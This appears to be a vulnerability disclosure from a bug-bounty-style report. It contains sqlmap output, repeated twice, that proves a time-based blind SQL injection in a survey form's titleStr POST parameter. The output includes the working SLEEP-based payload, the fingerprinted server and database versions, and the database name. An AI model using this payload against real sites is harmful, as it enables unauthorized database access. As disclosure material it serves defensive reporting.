sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: titleStr (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: titleStr=1111111' AND (SELECT * FROM (SELECT(SLEEP(5)))MXMC) AND 'ZIoa'='ZIoa&sexStr=male&companyStr=11111111&typeStr=K4350&phoneNum=11111111111&timeStr=3%E4%B8%AA%E6%9C%88%E5%86%85&emailStr=111111111@qq.com&buyNum=1&nameStr=111111 --- web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.24 back-end DBMS: MySQL 5.0.12 current database: 'survey'
漏洞证明:
POST注入:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: titleStr (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: titleStr=1111111' AND (SELECT * FROM (SELECT(SLEEP(5)))MXMC) AND 'ZIoa'='ZIoa&sexStr=male&companyStr=11111111&typeStr=K4350&phoneNum=11111111111&timeStr=3%E4%B8%AA%E6%9C%88%E5%86%85&emailStr=111111111@qq.com&buyNum=1&nameStr=111111 --- web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.24 back-end DBMS: MySQL 5.0.12 current database: 'survey'